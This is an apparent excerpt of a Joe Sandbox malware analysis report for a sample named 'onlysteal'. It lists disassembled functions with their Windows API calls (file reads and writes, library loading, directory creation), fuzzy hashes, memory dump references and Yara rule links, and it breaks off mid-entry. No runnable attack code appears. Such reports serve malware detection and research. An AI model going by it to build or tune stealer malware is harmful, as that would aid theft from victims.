                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 9a61b4eabad21d089b33980c6eb908d1c954e87d2165c51ef565b55111cb26af
                                      • Instruction ID: bbacaa380fe48bd6339095d5c0809600d64ffd93f6840a3178ef90aa2f7ed890
                                      • Opcode Fuzzy Hash: 9a61b4eabad21d089b33980c6eb908d1c954e87d2165c51ef565b55111cb26af
                                      • Instruction Fuzzy Hash: 09F0ECB242423567DB241FD4DC4ABFA3B58AF16B81B040492FD8996051D6F089A0DAB0
                                      Function 00239785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1082 239785-239791 1083 239793-23979b GetStdHandle 1082->1083 1084 23979e-2397b5 ReadFile 1082->1084 1083->1084 1085 239811 1084->1085 1086 2397b7-2397c0 call 2398bc 1084->1086 1087 239814-239817 1085->1087 1090 2397c2-2397ca 1086->1090 1091 2397d9-2397dd 1086->1091 1090->1091 1092 2397cc 1090->1092 1093 2397df-2397e8 GetLastError 1091->1093 1094 2397ee-2397f2 1091->1094 1095 2397cd-2397d7 call 239785 1092->1095 1093->1094 1096 2397ea-2397ec 1093->1096 1097 2397f4-2397fc 1094->1097 1098 23980c-23980f 1094->1098 1095->1087 1096->1087 1097->1098 1099 2397fe-239807 GetLastError 1097->1099 1098->1087 1099->1098 1101 239809-23980a 1099->1101 1101->1095
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00239795
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002397AD
                                      • GetLastError.KERNEL32 ref: 002397DF
                                      • GetLastError.KERNEL32 ref: 002397FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: b4cefbc7d8d7ac62ebb6ce1d6b50e67f3ea541e74fc1beebaeb5933999d2e9d5
                                      • Instruction ID: ef9cd97e826d5cf3dd179c3cd895244a669c3850bb55235082e750cd18b1b135
                                      • Opcode Fuzzy Hash: b4cefbc7d8d7ac62ebb6ce1d6b50e67f3ea541e74fc1beebaeb5933999d2e9d5
                                      • Instruction Fuzzy Hash: D6118EF0934205EBDF209F64D804A6A77A9FB83760F108A2AF416852D0D7F49EE4DF61
                                      Function 0025AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0023D710,00000000,00000000,?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue), ref: 0025AD66
                                      • GetLastError.KERNEL32(?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue,00267970,FlsSetValue,00000000,00000364,?,002598B7), ref: 0025AD72
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0025ACDB,0023D710,00000000,00000000,00000000,?,0025AED8,00000006,FlsSetValue,00267970,FlsSetValue,00000000), ref: 0025AD80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: fe5ee8acfc5b292720c5802e63e930b09816d55fd075cfe1e9d27e009bea4ddd
                                      • Instruction ID: 09bb11ecf1609c011722178ef2d59cf84cf7060d287e4630b82d8bd914db6268
                                      • Opcode Fuzzy Hash: fe5ee8acfc5b292720c5802e63e930b09816d55fd075cfe1e9d27e009bea4ddd
                                      • Instruction Fuzzy Hash: AB012432222227ABC7219E68BC49A567B78EF04BA37114320FC06D3550C770CC2886E5
                                      Function 0025BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002597E5: GetLastError.KERNEL32(?,00271030,00254674,00271030,?,?,00253F73,00000050,?,00271030,00000200), ref: 002597E9
                                        • Part of subcall function 002597E5: _free.LIBCMT ref: 0025981C
                                        • Part of subcall function 002597E5: SetLastError.KERNEL32(00000000,?,00271030,00000200), ref: 0025985D
                                        • Part of subcall function 002597E5: _abort.LIBCMT ref: 00259863
                                        • Part of subcall function 0025BB4E: _abort.LIBCMT ref: 0025BB80
                                        • Part of subcall function 0025BB4E: _free.LIBCMT ref: 0025BBB4
                                        • Part of subcall function 0025B7BB: GetOEMCP.KERNEL32(00000000,?,?,0025BA44,?), ref: 0025B7E6
                                      • _free.LIBCMT ref: 0025BA9F
                                      • _free.LIBCMT ref: 0025BAD5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID: p&
                                      • API String ID: 2991157371-4236815001
                                      • Opcode ID: f6fca61f18896f62ab565cb8906cee2c53d8788950255e15184e6d309843bedf
                                      • Instruction ID: 114471b49f0cb11b4b2a38bf926670874a74431f5e7e8c18d502fb62527d6e8b
                                      • Opcode Fuzzy Hash: f6fca61f18896f62ab565cb8906cee2c53d8788950255e15184e6d309843bedf
                                      • Instruction Fuzzy Hash: 34313B31910209AFDB12DFA8D445B9DB7F5EF44322F214099EC049B2A2EF725D68CF58
                                      Function 0024E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($$2$
                                      • API String ID: 1269201914-440871062
                                      • Opcode ID: 6c68e562b7eecf70bf6e09f2b946bc27038725b5376659db506b5510d437a2ed
                                      • Instruction ID: 0c9135373ec184481b1d4b476210bbc9661ab9fd24fb4897e959c7f88ce23f42
                                      • Opcode Fuzzy Hash: 6c68e562b7eecf70bf6e09f2b946bc27038725b5376659db506b5510d437a2ed
                                      • Instruction Fuzzy Hash: E7B012C16780007D3E0CB2095C02D3B010DE4C2F10371402EF405C0080E8800C700932
                                      Function 00239F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0023D343,00000001,?,?,?,00000000,0024551D,?,?,?), ref: 00239F9E
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0024551D,?,?,?,?,?,00244FC7,?), ref: 00239FE5
                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0023D343,00000001,?,?), ref: 0023A011
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 14b36b051541938205592651e7462e0db774626201d6885201441a6b57111f68
                                      • Instruction ID: 61e6174aa3790d22d61bdfc3c83ecb498893700c90bf8ce627cfb2a83551142f
                                      • Opcode Fuzzy Hash: 14b36b051541938205592651e7462e0db774626201d6885201441a6b57111f68
                                      • Instruction Fuzzy Hash: 0A31F9B1124306EFDB18CF24D818B6E77A5FF85710F00451DF88197290C7B59DA8CB92
                                      Function 0023A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0023C27E: _wcslen.LIBCMT ref: 0023C284
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A2D9
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A30C
                                      • GetLastError.KERNEL32(?,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A329
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                      • String ID:
                                      • API String ID: 2260680371-0
                                      • Opcode ID: bcddbf65c01eac2b4d29e95bcf52623ddef9c8c3d7fe3b1c86474d84724376b2
                                      • Instruction ID: 503aa4138457fb48c7b061b09ef293842318be733ce6f5ddf5d1101f3c6bfa6d
                                      • Opcode Fuzzy Hash: bcddbf65c01eac2b4d29e95bcf52623ddef9c8c3d7fe3b1c86474d84724376b2
                                      • Instruction Fuzzy Hash: E101FCB16302516AEF21AF759C49FFE3348AF09780F044475FD81E6081D764CAA1CAB3
                                      Function 0025B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0025B8B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: 7f9554c9b0d3b542c6d80e710160ca268c389a8ea96aac34096e62b6f5c9cbcb
                                      • Instruction ID: 07ddb3351581c6827bd30316fdca19afb98a59658211ce7adb70991095025580
                                      • Opcode Fuzzy Hash: 7f9554c9b0d3b542c6d80e710160ca268c389a8ea96aac34096e62b6f5c9cbcb
                                      • Instruction Fuzzy Hash: 9B41177051438C9EDF238E28CC84BF6BBADEB55305F1404ECE99A86142D375AA69CF64
                                      Function 0025AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0025AFDD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 9b6a73cde88b7f426e7d098fc717931f91ee8def62c265c95af1229be2c6a867
                                      • Instruction ID: 1e24fba14c8ffbba38a78e2719ab5cae1f70ba86f640c3fd34716407e6b416bb
                                      • Opcode Fuzzy Hash: 9b6a73cde88b7f426e7d098fc717931f91ee8def62c265c95af1229be2c6a867
                                      • Instruction Fuzzy Hash: 8801E532515209FBCF029F90EC06DEE7FA2EF09755F018255FE1466160CA728A71AF95
                                      Function 0025AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0025A56F), ref: 0025AF55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: e1a6d23addad960a6e15e34662763654132c4f0a295aa0e450ba7adc381ae2c1
                                      • Instruction ID: ef7c2a1befcc7627e97b91ca8f3753ee9a3aad29dc3b45f62c80993c52403ca4
                                      • Opcode Fuzzy Hash: e1a6d23addad960a6e15e34662763654132c4f0a295aa0e450ba7adc381ae2c1
                                      • Instruction Fuzzy Hash: EBF0E931656208BFCF169F54EC06D9DBFA1EF09712B008155FC089A260DA725E309B89
                                      Function 0025ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: e58da691790b6f0f9c3dfa7e5e04c3954371f535ae7f8355061609db080dea06
                                      • Instruction ID: 3b96a54e8a6628c6ecd5b159673069ca724dd7eacba08d2ec42feed4d64c1a7c
                                      • Opcode Fuzzy Hash: e58da691790b6f0f9c3dfa7e5e04c3954371f535ae7f8355061609db080dea06
                                      • Instruction Fuzzy Hash: 77E02B316662187BC705EB65FC07D6EBBE4DB56722B0142A9FC0597240CDB05E6086DA
                                      Function 0024E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: e9c9fd24133908910466c90565b1d53b0e78f996b3e834e96ae950a22a3f9234
                                      • Instruction ID: 5ac866153a2d4092967086aab7128226faf42ddb670ff4697a25a3d39577485d
                                      • Opcode Fuzzy Hash: e9c9fd24133908910466c90565b1d53b0e78f996b3e834e96ae950a22a3f9234
                                      • Instruction Fuzzy Hash: A5B012D52BC100AC3E4CB1491C42C3B010DE0C5B10331403EF80EC00A0D8807C700A71
                                      Function 0024E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 7aff6cfe3d016c4feeda1d536cec966df07cd1c37ef887d3949c9e9937e8a309
                                      • Instruction ID: 884a873827e19646fb88b5675ec88715823f7291547d7df9fc42e349471ff218
                                      • Opcode Fuzzy Hash: 7aff6cfe3d016c4feeda1d536cec966df07cd1c37ef887d3949c9e9937e8a309
                                      • Instruction Fuzzy Hash: 1CB012D62B8000AC3E4CB2051C02C3B010DD0C6B10331C03EFC0EC0190D880BC740971
                                      Function 0024E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: e69cfa00bf380068fa458eceaed2a409204bd0ad9310a4d2cd4416e9ceb738a5
                                      • Instruction ID: 51f461696a184eea2ff7feabc225f53e3bebbedfb420160b0737d7cddd29e06d
                                      • Opcode Fuzzy Hash: e69cfa00bf380068fa458eceaed2a409204bd0ad9310a4d2cd4416e9ceb738a5
                                      • Instruction Fuzzy Hash: 13B012D92B8100BC3E0C71451C42C3B010DD0C6B10331843EFC0ED0490D880BC700871
                                      Function 0024E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 53c245b1cfd8fb325079892bb888c59e10ad217faa6ea7f7c7492d8e8baec253
                                      • Instruction ID: af55692551c10789a6c14e6c181d1f4c77c0c20490baa609a63f7b36112ff9c2
                                      • Opcode Fuzzy Hash: 53c245b1cfd8fb325079892bb888c59e10ad217faa6ea7f7c7492d8e8baec253
                                      • Instruction Fuzzy Hash: 4BB012E12B8100BC3E8CB1051C06D3B010DD0C5F20331413FF80EC0090D8807DB00971
                                      Function 0024E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
